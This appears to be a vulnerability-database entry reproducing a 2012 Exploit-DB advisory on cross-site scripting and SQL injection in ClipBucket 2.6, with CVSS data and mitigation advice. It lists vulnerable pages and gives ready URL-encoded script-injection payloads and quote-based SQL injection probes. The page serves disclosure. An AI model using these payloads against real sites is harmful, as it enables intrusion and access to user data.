Multiple Vulnerability on ClipBucket 2.6

vendor:

Clip Bucket (Open Source Video Sharing)

by:

YaDoY666

7,5

CVSS

HIGH

Cross Site Scripting, SQL Injection

79, 89

CWE

Product Name: Clip Bucket (Open Source Video Sharing)

Affected Version From: 2.6

Affected Version To: 2.6

Patch Exists: NO

Related CWE: N/A

CPE: a:clipbucket:clipbucket:2.6

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2012

Multiple Vulnerability on ClipBucket 2.6

ClipBucket 2.6 is vulnerable to Cross Site Scripting and SQL Injection. The vulnerable parameters are cat, seo_cat_name, sort, time, cid, type, collection, item. An attacker can inject malicious JavaScript code and SQL queries in these parameters to execute arbitrary code and access sensitive information.

Mitigation:

Input validation should be done on the server side to prevent malicious code injection. Parameterized queries should be used to prevent SQL injection.

Source

Exploit-DB raw data:

#	Exploit			: Multiple Vulnerability on ClipBucket 2.6
#	Date 			: 09 January 2012
#	Author			: YaDoY666
#	Website			: http://yadoy666.serverisdown.org
#	Software		: Clip Bucket (Open Source Video Sharing)
#	Version			: 2.6 
#	Vendor			: Clip Bucket (http://clip-bucket.com)
#	Vendor Response	: None

Cross Site Scripting
====================

[[=]]	http://[site]/[path]/channels.php
[[=]]	http://[site]/[path]/collections.php
[[=]]	http://[site]/[path]/groups.php
[[=]]	http://[site]/[path]/search_result.php
[[=]]	http://[site]/[path]/videos.php
[[=]]	http://[site]/[path]/view_collection.php
[[=]]	http://[site]/[path]/view_item.php

Example :
http://[site]/[path]/channels.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/collections.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/groups.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/search_result.php?query=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&submit=Search&type=
http://[site]/[path]/videos.php?cat=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E&seo_cat_name=&sort=most_recent&time=all_time
http://[site]/[path]/view_collection.php?cid=9&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E
http://[site]/[path]/view_item.php?collection=9&item=KWSWG7S983SY&type=%27%22%28%29%26%251%3CScRiPt%20%3Ealert%28%27YaDoY666%20Was%20Here%27%29%3C%2fScRiPt%3E

SQL Injection
==============

[[=]]	http://[site]/[path]/channels.php
[[=]]	http://[site]/[path]/videos.php

Example :
http://[site]/[path]/videos.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27
http://[site]/[path]/channels.php?cat=all&seo_cat_name=&sort=most_recent&time=1%27


Greets : KombezNux | Jack | X-Shadow | Don Tukulesto | GBlack | elv1n4 | GBlack | Kamtiez | n4ck0 | AaEzha | ServerIsDown | Indonesian Coder |